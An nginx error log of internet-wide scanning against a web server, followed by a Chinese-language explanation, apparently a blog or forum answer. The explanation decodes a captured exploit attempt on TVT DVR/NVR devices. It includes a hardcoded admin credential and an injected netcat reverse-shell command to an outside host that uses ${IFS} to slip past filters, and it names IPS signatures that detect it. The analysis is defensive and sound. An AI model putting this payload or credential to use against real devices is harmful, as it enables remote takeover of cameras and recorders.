2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
任何连接到 public 互联网的服务器都会在某种程度上受到攻击,即使它并不容易受到攻击。 Internet 范围内的漏洞扫描会找到适合您的方式。流量表示 PHP 扫描和最近在我的 IPS 上显示的其他一些有趣的流量:
主机 93.174.93[.]178
向目的地 URL "editBlackAndWhiteList" 发送 HTTP POST
请求,使用 Base64 编码凭据:
admin:{12213BD1-69C7-4862-843D-260500D1DA40}
XML 负载:
refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)
IFS 代表 "internal field separator"。 shell 使用它来确定如何进行分词。
IFS
的默认值由白色space 个字符(space、制表符和换行符)组成。 $IFS or ${IFS}
,常用于命令注入,代替白色space。对于许多命令行解释器,shells 的 Unix 操作系统,内部字段分隔符是一个变量,它定义用于将模式分隔为某些操作的标记的字符。
$(nc 93.174.93[.]178 31337 -e $SHELL&)
– Netcat 反向 Shell 到端口 31337
上的主机 93.174.93[.]178
。
Fortinet 对此流量有一个 IPS
签名,“HTTP.Unix.Shell.IFS.Remote.Code.Execution.”
它表示检测到使用内部字段分隔符的可疑 HTTP 请求。
https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution
Snort IPS 在签名下标记此流量,“ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted.”
主机试图通过硬编码的 'admin' Web GUI 密码利用深圳市同天数码科技有限公司和 OEM {DVR/NVR/IPC} API 中的远程代码执行漏洞获得反向 shell。 GitHub 上有六个 POC:https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
明智的做法是在您的网络服务器前设置一个 IPS。